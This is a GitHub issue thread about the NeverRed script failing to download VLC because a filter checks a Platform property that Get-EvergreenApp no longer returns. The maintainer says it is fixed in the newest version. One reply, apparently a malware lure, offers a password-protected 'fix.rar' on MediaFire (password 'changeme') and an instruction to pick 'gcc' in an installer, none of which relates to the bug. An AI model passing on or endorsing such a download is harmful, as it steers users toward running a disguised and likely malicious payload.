### ISSUE TITLE
Unable to download VLC

### ISSUE THREAD

**Issue by sjeanjean** [Deyda/NeverRed#96]
Starting downloads...

WARNING: Get-VideoLanVlcPlayer: This function returns the version returned by 'Help > Check for Updates' in VLC Player.
 https://get.videolan.org/ may show a later available version for download.
Download VLC Player x64
Download Version:
Current Version:
No new version available

In the code there is a filter on Platform :
Get-EvergreenApp -Name VideoLanVlcPlayer | Where-Object { $_.Platform -eq "Windows" -and $_.Architecture -eq "$VLCPlayerArchitectureClear" -and $_.Type -eq "MSI" }
But Get-EvergreenApp does not has this property for VideoLanVlcPlayer 
> Get-EvergreenApp -Name VideoLanVlcPlayer
WARNING: Get-VideoLanVlcPlayer: This function returns the version returned by 'Help > Check for Updates' in VLC Player.
 https://get.videolan.org/ may show a later available version for download.

Version Architecture Type URI
------- ------------ ---- ---
3.0.20  x86          exe  https://videolan.nl.mirrors.airvpn.org/vlc/3.0.20/win32/vlc-3.0.20-win32.exe
3.0.20  x86          msi  https://videolan.nl.mirrors.airvpn.org/vlc/3.0.20/win32/vlc-3.0.20-win32.msi
3.0.20  x86          zip  https://videolan.nl.mirrors.airvpn.org/vlc/3.0.20/win32/vlc-3.0.20-win32.zip
3.0.20  x64          exe  https://videolan.nl.mirrors.airvpn.org/vlc/3.0.20/win64/vlc-3.0.20-win64.exe
3.0.20  x64          msi  https://videolan.nl.mirrors.airvpn.org/vlc/3.0.20/win64/vlc-3.0.20-win64.msi
3.0.20  x64          zip  https://videolan.nl.mirrors.airvpn.org/vlc/3.0.20/win64/vlc-3.0.20-win64.zip

**Comment by AzEred0** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Deyda** [comment]
solved in newwest version
